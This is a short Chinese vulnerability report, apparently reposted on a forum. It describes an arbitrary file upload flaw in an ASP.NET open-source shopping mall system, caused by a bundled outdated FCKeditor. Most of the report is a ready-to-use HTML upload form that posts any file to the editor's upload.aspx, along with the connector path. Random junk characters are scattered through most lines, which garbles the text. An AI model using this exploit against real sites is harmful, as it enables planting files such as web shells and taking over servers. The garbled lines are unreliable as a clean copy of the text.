披露状态:2011-07-19: 细节已通知厂商并且等待厂商处理中2 N. v; e4 V2 G' s% d
2011-07-20: 厂商已经主动忽略漏洞,细节向公众公开1 _, j1 T5 a2 [( |9 p# d
简要描述:这个号称中国首家ASP.NET免费开源商城购物系统。最新版本是4.7,竟然采用2.4版本以下的fckeditor编辑器。所以可以直接上传任意文件。/ t0 a8 x3 z1 K$ _
详细说明:其他版本我没测试,估计也是一样的问题2 x6 j3 A. q7 e- t( V; {
http://127.0.0.1/controls/fckedi ... aspx/connector.aspx' U! u1 R# x5 |0 P! a
跳转到网站根目录上传任意文件。: n) n9 j, \9 f/ m
漏洞证明:如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件* R; P) h0 k6 C" R. \" X3 m# Z) k5 {
<form id="frmUpload" enctype="multipart/form-data" action="http://127.0.0.1/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
3 h6 u3 i2 Z" ]6 Z' m Upload a new file:<br>/ ^' b$ }6 q0 D" t: C
<input type="file" name="NewFile" size="50"><br>
A5 e. b4 u/ D1 ]# G# } <input id="btnUpload" type="submit" value="Upload"> ~! h. b+ d% F/ G2 d
</form> |
发表于 2012-9-10 20:46:29
收藏
支持
反对